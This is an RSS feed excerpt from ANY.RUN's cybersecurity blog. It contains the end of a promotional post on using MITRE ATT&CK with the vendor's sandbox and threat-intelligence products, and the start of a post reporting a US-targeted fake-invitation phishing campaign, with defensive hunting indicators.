<p><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a>&nbsp;provide continuously updated, machine-readable threat intelligence stream&nbsp;of&nbsp;IOCs (indicators of compromise)&nbsp;with&nbsp;malware family tags&nbsp;derived from real detonations in ANY.RUN&#8217;s Interactive Sandbox. Security teams can pipe these feeds directly into their SIEM or EDR, ensuring that MITRE-mapped detection rules stay current with actual adversary activity.&nbsp;</p>



<p><strong>Business&nbsp;objective</strong>:&nbsp;Cut&nbsp;MTTD for novel threats. Increase the ratio of high-fidelity alerts to total alerts, lowering analyst alert fatigue and improving coverage of emerging attack vectors.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce breach impact</span>, not just detect threats.<br>
Fuel MITRE ATT&#038;CK with real-time intelligence and full attack visibility.</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=mitre-ciso-risk-reduction&#038;utm_term=060526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Try ANY.RUN
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">2. Speed Matters: Accelerating Triage with Behavioral Context&nbsp;</h2>



<p>MITRE maps alerts to techniques, but analysts need rapid understanding of intent, impact, and validity to avoid alert fatigue. An alert tagged T1059.001 (PowerShell) tells an analyst that the technique involves command and scripting interpreter abuse. T1112 (Modify Registry) points to potential persistence or defense evasion. This context is valuable. But it is the starting point, not the destination.&nbsp;</p>



<h3 class="wp-block-heading">What the SOC Actually Needs&nbsp;</h3>



<p>Analysts dealing with hundreds of alerts per shift cannot afford multi-minute pivot chains to understand whether a flagged PowerShell execution is a legitimate IT automation&nbsp;script&nbsp;or the first stage of a ransomware deployment.&nbsp;They need behavior and impact context fast: What did this process actually do?&nbsp;Has this file hash or domain been seen in confirmed malicious activity?&nbsp;&nbsp;</p>



<h3 class="wp-block-heading">Solution: Reduce MTTD with Full Attack Visibility inside a Sandbox&nbsp;</h3>



<p><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat&nbsp;Intelligence&nbsp;Lookup</strong></a>&nbsp;is a searchable threat&nbsp;data&nbsp;repository built on ANY.RUN&#8217;s analysis history. Analysts can query file hashes, IPs, domains, URLs, and process names and instantly surface related sandbox reports&nbsp;<a href="https://any.run/cybersecurity-blog/mitre-ttps-in-ti-lookup/" target="_blank" rel="noreferrer noopener">with&nbsp;MITRE ATT&amp;CK mappings</a>, malware family attributions, and associated threat actor context.&nbsp;&nbsp;</p>



<p>During triage, analysts can answer the key questions before escalating: Is this a known threat? What does it do? Which ATT&amp;CK techniques are involved? What is the&nbsp;likely impact?&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="549" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32-1024x549.png" alt="" class="wp-image-20778" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32-1024x549.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32-300x161.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32-768x411.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32-370x198.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32-270x145.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32-740x396.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_32.png 1426w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN Intelligence linking ATT&amp;CK techniques to malware samples and behaviors</em></figcaption></figure>



<p><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a>&nbsp;complements TI Lookup for unknown samples. If an URL&nbsp;yields no TI Lookup match, analysts can&nbsp;submit&nbsp;it to the sandbox and receive a full behavioral report&nbsp;(process tree, network activity, file system changes, and ATT&amp;CK technique tags)&nbsp;in minutes.&nbsp;&nbsp;</p>



<p>Unlike automated sandboxes that process samples silently, ANY.RUN lets analysts interact with the execution — clicking through prompts,&nbsp;observing&nbsp;network connections, and watching process trees unfold — while the sandbox maps every observed behavior to MITRE ATT&amp;CK techniques in real time.&nbsp;&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="479" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2-1024x479.png" alt="" class="wp-image-20779" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2-1024x479.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2-300x140.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2-768x359.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2-370x173.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2-270x126.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2-740x346.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_2.png 1408w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Attack techniques detected in ANY.RUN sandbox detonation</em></figcaption></figure>



<p><strong>Business&nbsp;objective:</strong>&nbsp;Reduce mean triage time per alert. Decrease false positive escalations. Increase analyst capacity without headcount growth,&nbsp;<a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">enabling the SOC</a>&nbsp;to handle greater alert volume at the same staffing level.&nbsp;</p>



<h2 class="wp-block-heading">3. Incident Response: From Labels to Action&nbsp;</h2>



<p>MITRE ATT&amp;CK gives incident responders a structured model for understanding what an adversary may have done across the kill chain.&nbsp;It offers a common language and playbooks for containment, full visibility into attacker actions for precise, minimal-disruption response. This is genuinely valuable for&nbsp;architecting&nbsp;investigations and communicating findings to stakeholders.&nbsp;</p>



<h3 class="wp-block-heading">What the SOC Actually Needs&nbsp;</h3>



<p>During an active incident, responders need&nbsp;execution&nbsp;context. Which processes ran? In which order? What registry keys were&nbsp;modified? Which files were dropped and where? Which internal hosts did the malware beacon to? Without this granular&nbsp;execution&nbsp;responders&nbsp;end up&nbsp;remediating&nbsp;visible symptoms while the attacker&nbsp;maintains&nbsp;persistence through overlooked footholds.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn MITRE ATT&#038;CK into measurable risk reduction.<br>
Use ANY.RUN to <span class="highlight">detect threats earlier and respond faster.</span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=mitre-ciso-risk-reduction&#038;utm_term=060526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Start now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Solution: Compress Containment Time with Complete Execution Context&nbsp;</h3>



<p><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a>&nbsp;generates a complete execution timeline for any submitted sample: full process trees (parent/child relationships, command-line arguments), all network connections (DNS queries, HTTP/S requests, C2 communication patterns), file system changes (created,&nbsp;modified, deleted files), and registry modifications.&nbsp;&nbsp;</p>



<p>Every action is timestamped and tagged with the corresponding MITRE ATT&amp;CK technique. Responders&nbsp;don&#8217;t&nbsp;need to reconstruct what malware did from endpoint telemetry alone. They have a ground-truth behavioral record from a controlled detonation.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="531" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-1024x531.png" alt="" class="wp-image-20782" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-1024x531.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-300x156.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-768x398.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-1536x796.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-370x192.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-270x140.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4-740x384.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_4.png 1827w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Processes mapped to MITRE ATT&amp;CK techniques in a sandbox detonation</em></figcaption></figure>



<p><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>TI Lookup</strong></a>&nbsp;accelerates the lateral movement investigation. If an incident involves a suspicious IP or domain used for C2, TI Lookup surfaces all&nbsp;previous&nbsp;ANY.RUN analyses involving that indicator. It helps&nbsp;reveal which malware families have&nbsp;used it, when, and in what context.&nbsp;&nbsp;</p>



<p><strong>Business&nbsp;objective</strong>: Reduce mean time to&nbsp;contain&nbsp;(MTTC) by giving responders complete execution context at the start of an investigation. Decrease re-infection rates by&nbsp;ensuring&nbsp;all persistence mechanisms are documented and remediated. Reduce incident response costs by compressing investigation timelines.&nbsp;</p>



<h2 class="wp-block-heading">4. Proactive Defense: Supercharging Threat Hunting with Real Patterns&nbsp;</h2>



<p>Threat hunting (proactively searching for adversary presence that evaded automated defenses) is where MITRE ATT&amp;CK suggests hypotheses: if you are in a financial services organization, groups like FIN7 or&nbsp;Carbanak&nbsp;are relevant threats; their documented techniques (T1059, T1027, T1547) suggest where to look in your telemetry. This starting point is invaluable.&nbsp;</p>



<h3 class="wp-block-heading">What the SOC Actually Needs&nbsp;</h3>



<p>A successful hunt requires more than &#8220;look for PowerShell abuse&#8221;.&nbsp;It requires the specific parent-child process relationships, the exact command-line patterns, the&nbsp;particular registry&nbsp;keys, the network destinations that real-world attackers targeting your industry have&nbsp;actually used&nbsp;recently.&nbsp;Generic ATT&amp;CK-based hunt queries produce excessive noise and burn hunter time on false leads. Real attack patterns are the fuel that makes hunts productive.&nbsp;</p>



<h3 class="wp-block-heading">Solution: Turn Hunt Hypotheses into High-Yield Findings with Real Attacker Patterns&nbsp;</h3>



<p><strong>Threat&nbsp;Intelligence&nbsp;Lookup</strong>&nbsp;enables hunt pivoting at scale. A hunter who&nbsp;identifies&nbsp;a suspicious process name can query TI Lookup to find all samples that share that process, discover related IOCs,&nbsp;identify&nbsp;the malware family, and extract the precise command-line patterns that family uses. This turns a single hunt lead into a comprehensive behavioral profile needed to write high-confidence hunt queries.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="452" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1-1024x452.png" alt="" class="wp-image-20790" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1-1024x452.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1-300x133.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1-768x339.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1-370x163.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1-270x119.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1-740x327.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/mitre_1-1.png 1245w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>MITRE ATT&amp;CK matrix in ANY.RUN’s TI Lookup</em></figcaption></figure>



<p>The combination of&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>&nbsp;transforms threat hunting from a creative exercise into an evidence-based discipline grounded in real adversary behavior.&nbsp;</p>



<p><strong>Business objective</strong>: Increase the yield rate of threat hunts (confirmed findings per hunt hour). Identify attacker dwell time earlier, reducing the average time an adversary operates undetected inside the network. Demonstrate proactive risk reduction to board and audit stakeholders. </p>



<h2 class="wp-block-heading">Conclusion: From Framework to Force Multiplier&nbsp;</h2>



<p>MITRE ATT&amp;CK has fundamentally changed how the security industry thinks about risk:&nbsp;from abstract control gaps to concrete adversary behaviors. For CISOs, this shift&nbsp;represents&nbsp;an opportunity to speak a language that resonates equally in the boardroom and the SOC: the language of what attackers&nbsp;actually do, and how prepared your organization is to detect,&nbsp;contain, and recover.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Make every SOC workflow count toward business protection.<br>
Connect MITRE ATT&#038;CK with <span class="highlight">live actionable threat data.</span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=mitre-ciso-risk-reduction&#038;utm_term=060526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact sales
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>But the framework&#8217;s potential is only realized when it is connected to operational reality. MITRE ATT&amp;CK without actionable threat intelligence is a map without territory. The SOC workflows that matter&nbsp;(monitoring, triage, incident response, and threat hunting)&nbsp;all require real-world adversary data to function at the speed and&nbsp;fidelity&nbsp;modern threats demand.&nbsp;</p>



<p>ANY.RUN&#8217;s threat&nbsp;analysis and&nbsp;intelligence products&nbsp;are&nbsp;purpose-built to close this gap. Together, they transform MITRE ATT&amp;CK from a conceptual framework into an operational engine that drives measurable risk reduction across every phase of the security operations cycle.&nbsp;</p>



<h2 class="wp-block-heading">About&nbsp;ANY.RUN&nbsp;</h2>



<p>ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect, investigate, and respond to threats faster.</p>



<p>ANY.RUN solutions include <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a>, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a>, <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a>, and integrations for SOC workflows across SIEM, SOAR, EDR, and other security tools. Together, they help teams safely analyze suspicious links, files, and scripts, uncover phishing behavior, trace credential theft and remote access activity, and enrich investigations with real-world threat context.</p>



<p>Built for security-conscious organizations, ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener"><strong>SOC 2 Type II attested</strong></a> and supports enterprise-ready controls such as <strong>SSO, MFA, granular privacy settings, and AES-256-CBC encryption</strong>.</p>



<p>Trusted by more than <strong>15,000 organizations</strong> and <strong>600,000 security professionals worldwide</strong>, ANY.RUN gives SOC teams the visibility they need to move from uncertain alerts to evidence-based decisions.</p>



<h2 class="wp-block-heading">FAQ&nbsp;</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1778059821810"><strong class="schema-faq-question">Can MITRE ATT&amp;CK help me reduce cyber insurance premiums? </strong> <p class="schema-faq-answer">Yes. Demonstrating ATT&amp;CK-mapped controls, gap closures, and proactive testing provides evidence of mature risk management, which insurers often reward with lower premiums.</p> </div> <div class="schema-faq-section" id="faq-question-1778059828561"><strong class="schema-faq-question">What is the difference between MITRE ATT&amp;CK detection coverage and risk reduction? </strong> <p class="schema-faq-answer">Detection coverage measures visibility into techniques; risk reduction quantifies business impact mitigation (e.g., prevented data loss or downtime) through layered defenses, response speed, and proactive measures.</p> </div> <div class="schema-faq-section" id="faq-question-1778059838463"><strong class="schema-faq-question">How often should I reassess risk using MITRE ATT&amp;CK? </strong> <p class="schema-faq-answer">Quarterly at minimum, or after major incidents, new threat actor campaigns, or significant environment changes. Continuous integration via feeds and hunting yields ongoing insights.</p> </div> <div class="schema-faq-section" id="faq-question-1778059847863"><strong class="schema-faq-question">How does MITRE ATT&amp;CK integrate with existing frameworks like NIST? </strong> <p class="schema-faq-answer">It complements them by adding adversary behavior details to NIST’s risk management processes, enabling more targeted control implementation and effectiveness measurement.</p> </div> <div class="schema-faq-section" id="faq-question-1778059861919"><strong class="schema-faq-question">What role do ANY.RUN&#8217;s solutions play in operationalizing ATT&amp;CK? </strong> <p class="schema-faq-answer">They provide real-world context, fresh IOCs/IOAs, and behavioral examples that make abstract TTPs immediately actionable in monitoring, triage, and hunting.</p> </div> <div class="schema-faq-section" id="faq-question-1778059876983"><strong class="schema-faq-question">How can small teams start using MITRE ATT&amp;CK effectively? </strong> <p class="schema-faq-answer">Begin with high-priority tactics relevant to your industry, map existing tools, use free ATT&amp;CK Navigator, and incorporate accessible behavioral intelligence sources for quick wins in triage and response. </p> </div> </div>



<p> </p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/">How CISOs Reduce Cyber Risk with MITRE ATT&amp;CK </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>New Phishing Campaign Targets US with Credential Theft: What CISOs Need to Know</title>
		<link>https://any.run/cybersecurity-blog/us-fake-invitation-phishing/</link>
					<comments>https://any.run/cybersecurity-blog/us-fake-invitation-phishing/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 05 May 2026 12:59:53 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20662</guid>

					<description><![CDATA[<p>A new large-scale phishing campaign is targeting U.S. organizations with fake event invitations that lead to credential theft, OTP interception, or RMM tool installation. ANY.RUN researchers found that the campaign uses a repeatable phishing framework to create event-themed lure pages at scale. Some pages steal email credentials and OTP codes, while others deliver legitimate remote [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/us-fake-invitation-phishing/">New Phishing Campaign Targets US with Credential Theft: What CISOs Need to Know</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A new large-scale phishing campaign is targeting U.S. organizations with fake event invitations that lead to credential theft, OTP interception, or RMM tool installation.</p>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> researchers found that the campaign uses a repeatable phishing framework to create event-themed lure pages at scale. Some pages steal email credentials and OTP codes, while others deliver legitimate remote management tools such as ScreenConnect, ITarian, Datto RMM, ConnectWise, and LogMeIn Rescue.</p>



<p>For CISOs, the risk is not just another phishing wave. It is the combination of credential theft, trusted remote access tools, and infrastructure designed to look legitimate. That mix can delay detection, stretch SOC triage, weaken response confidence, and create a path to remote access before the business fully understands what happened.</p>



<h2 class="wp-block-heading">Key Takeaways</h2>



<ul class="wp-block-list">
<li><strong>A large-scale fake invitation phishing campaign is targeting U.S. organizations</strong>: ANY.RUN researchers found nearly 160 suspicious links related to the campaign and around 80 phishing domains.</li>



<li><strong>The campaign creates more than one access risk</strong>: Some lure pages steal email credentials and OTP codes, while others deliver legitimate RMM tools for remote management.</li>



<li><strong>The early attack flow can look routine</strong>:&nbsp;Victims see a CAPTCHA check and an event invitation page before the campaign moves toward credential theft or RMM delivery.</li>



<li><strong>Repeatable infrastructure gives SOC teams huntable signals</strong>: Shared URL patterns, fixed resource paths such as <code>/Image/*.png</code>, and requests to <code>/favicon.ico</code> and <code>/blocked.html</code> help connect related activity.</li>



<li><strong>For CISOs, the risk is delayed detection and response</strong>:&nbsp;One fake invitation can lead to mailbox compromise, OTP interception, or remote access before the business has clear evidence of impact.</li>



<li><strong><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> helps CISOs strengthen phishing response readiness</strong>:&nbsp;SOC teams get the visibility to validate threats faster, reduce gray-zone investigations, and contain risk before it becomes account compromise or remote access.</li>
</ul>



<h2 class="wp-block-heading">The&nbsp;Phishing&nbsp;Blind&nbsp;Spot&nbsp;CISOs&nbsp;Need&nbsp;to&nbsp;Close&nbsp;</h2>



<p>Most enterprise security programs are built to catch obvious signs of compromise: known malicious domains, suspicious payloads, credential abuse, or unauthorized remote access. This campaign creates a harder problem because the early stages can look like normal user behavior.</p>



<p>The attack starts with a CAPTCHA check and a fake event invitation. From there, it can lead to credential theft, OTP interception, or the installation of a legitimate RMM tool. Each step may look harmless inisolation, but together they create a path to account compromise or remote access.</p>



<p>For CISOs, the risk is clear: if the SOC only reacts after credentials are stolen or remote access is established, the organization is already behind the attack.</p>



<p>The&nbsp;outcome&nbsp;can&nbsp;be&nbsp;serious:&nbsp;</p>



<ul class="wp-block-list">
<li>Slower&nbsp;detection&nbsp;because&nbsp;early&nbsp;phishing&nbsp;signals&nbsp;look&nbsp;routine&nbsp;</li>



<li>Greater chance of unauthorized access through legitimate RMM tools</li>



<li>Higher&nbsp;risk&nbsp;of&nbsp;credential&nbsp;and&nbsp;OTP&nbsp;compromise&nbsp;</li>



<li>More&nbsp;pressure&nbsp;on&nbsp;SOC&nbsp;teams&nbsp;to&nbsp;connect&nbsp;fragmented&nbsp;signals&nbsp;quickly&nbsp;</li>



<li>Delayed&nbsp;containment&nbsp;when&nbsp;domains&nbsp;and&nbsp;lure&nbsp;pages&nbsp;keep&nbsp;changing&nbsp;</li>



<li>Weaker&nbsp;confidence&nbsp;that&nbsp;phishing&nbsp;activity&nbsp;is&nbsp;being&nbsp;caught&nbsp;before&nbsp;business&nbsp;impact&nbsp;</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Stop fake lures from turning into real incidents. 
 <br>
<span class="highlight">Give your SOC the visibility to detect and contain threats earlier. <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=US-fake-invitation-phishing&#038;utm_term=050526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">High-Exposure&nbsp;Sectors&nbsp;for&nbsp;This&nbsp;Campaign&nbsp;</h2>



<p>ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> shows that most analysis tasks related to this campaign came from the <strong>United States</strong>, suggesting that U.S. organizations may be the primary target.</p>



<p>As of April 27, nearly <strong>160 suspicious links</strong> related to this campaign had been analyzed in <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s sandbox</a>, with around <strong>80 phishing domains</strong> identified. Most of these domains were registered underthe <strong>.de</strong> top-level domain, starting from December 2025.</p>



<p>TI&nbsp;Query:&nbsp;<a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotilookup#{%22query%22:%22url:%5C%22/blocked.html%5C%22%20AND%20url:%5C%22/favicon.ico%5C%22%20and%20url:%5C%22/Image/*.png%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">url:&#8221;/blocked.html&#8221; AND&nbsp;url:&#8221;/favicon.ico&#8221; and&nbsp;url:&#8221;/Image/*.png&#8221;</a>&nbsp;</p>


<div class="wp-block-image">
